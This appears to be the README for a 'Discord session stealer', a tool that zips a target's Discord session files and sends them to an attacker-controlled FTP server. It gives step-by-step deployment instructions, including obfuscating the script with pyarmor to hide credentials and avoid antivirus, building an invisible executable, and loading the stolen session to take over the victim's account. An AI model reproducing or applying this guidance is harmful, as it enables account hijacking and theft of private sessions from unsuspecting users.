Discord session stealer
Simple tool for stealing discord's session files, zipping them and sending archive via ftp
In order to use this tool you need either python3 installed on target machine or you need to build standalone executables
Change this lines in 'dealer.py':
#ftp.connect(<SERVER>, <PORT>)
#ftp.login(<USER>, <PASSWORD>)
#ftp.cwd(<REMOTE FTP DIRECTORY>)
Insert FTP credentials - IP, port, username, password and remote directory to save zip archive to and remove # from beginnig of the lines
- Deploy dealer.py on target machine and run "python dealer.py"
- Install requirements:
- pyarmor - obfuscate code to hide creds and reduce antivirus alarm possibility
- pyinstaller - build standalone executables from python scripts
pip install pyarmor pyinstaller
- Build executable using provided build scripts (bat on Windows, sh on Linux)
Scripts require arguments for pyinstaller. Common ones:
- "-F" - pack to single binary file
- "-w" - window mode (basically make app invisible on windows)
build.bat(.sh) -F -w
- Deploy built executable from "dist" folder to target machine and run it
- Unpack received zip file from ftp-server to your discord directory with discord app closed
- On Windows - go to %AppData%\discord
- On Linux - ~/.config/discord
- Run discord and you will get target's session